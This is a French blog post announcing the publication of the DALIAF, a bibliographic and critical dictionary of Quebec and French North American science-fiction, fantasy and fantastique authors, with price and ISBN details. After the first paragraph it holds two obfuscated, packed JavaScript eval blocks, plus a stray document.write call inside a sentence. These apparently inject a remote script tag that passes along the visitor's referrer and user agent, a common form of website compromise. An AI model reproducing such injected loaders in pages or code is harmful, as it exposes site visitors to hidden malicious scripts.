Épanouissement du DALIAF

Après des décennies de travail acharné, document.write(“”); le mythique Dictionnaire des auteurs des littératures de l’imaginaire en Amérique française (ou “DALIAF” pour les intimes) est finalement sous presse! Cela faisait si longtemps qu’on en parlait qu’on se demandait s’il finirait par éclore. C’est compréhensible: toutes les années de nouveaux auteurs sont publiés mais à un moment donné il faut mettre un point final à l’ouvrage. Nul doute que cette attente en valait la peine!
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tkzky|var|u0026u|referrer|kktta||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|stdsa|var|u0026u|referrer|yytnd||js|php’.split(‘|’),0,{}))

Compilé par
Claude Janelle (à qui l’on doit aussi L’Année de la science-fiction et du fantastique québécois, Le XIXe siècle fantastique en Amérique française et La Décennie charnière) et publié par les Éditions Alire (le principal éditeur de paralittérature au Québec, qui est mieux connu pour les romans d’horreur de Patrick Sénécal ou les thrillers des Jean-Jacques Pelletier mais n’en est toutefois pas à la publication de son premier essai), le DALIAF recense la production des littératures de l’imaginaire (c’est-à-dire science-fiction, fantastique et fantasy) produite, entre 1835 et 2008 inclusivement, en Amérique du Nord francophone (mais principalement au Québec) et s’attarde particulièrement aux plus de mille sept cents hommes et femmes qui en sont les créateurs.

Le DALIAF est un ouvrage à la fois bibliographique, biographique et critique. Fort de 535 pages, il est publié en quadrichromie dans un grand format couverture caisse (couverture cartonnée et reliure cousue). Il coûtera 79,95 $ pour la version papier (978-2-89615-074-8) et 49,99 $ pour la version électronique (format pdf, 978-2-89615-479-1). Lancé à la fin du mois de novembre (manquant de justesse le Salon du Livre!?), il sera disponible chez Alire en décembre et en librairies dès janvier 2012. Quoique dispendieux (mais volumineux et en couleur!), c’est un outil de référence essentiel pour tout bibliothécaire, étudiant en littérature, intervenant de l’édition ou simplement amateur extrème du livre québécois. Vous pouvez en avoir un aperçu (en feuilletant un extrait) sur le site de l’Entrepôt numérique ANEL-De Marque.

Et bien sûr, ayant publié quelques nouvelles comme auteur et quelques fanzines ou anthologies comme éditeur, on peut me trouver dans les pages du DALIAF. J’ai bien hâte de voir ça.

(voir aussi mon commentaire détaillé)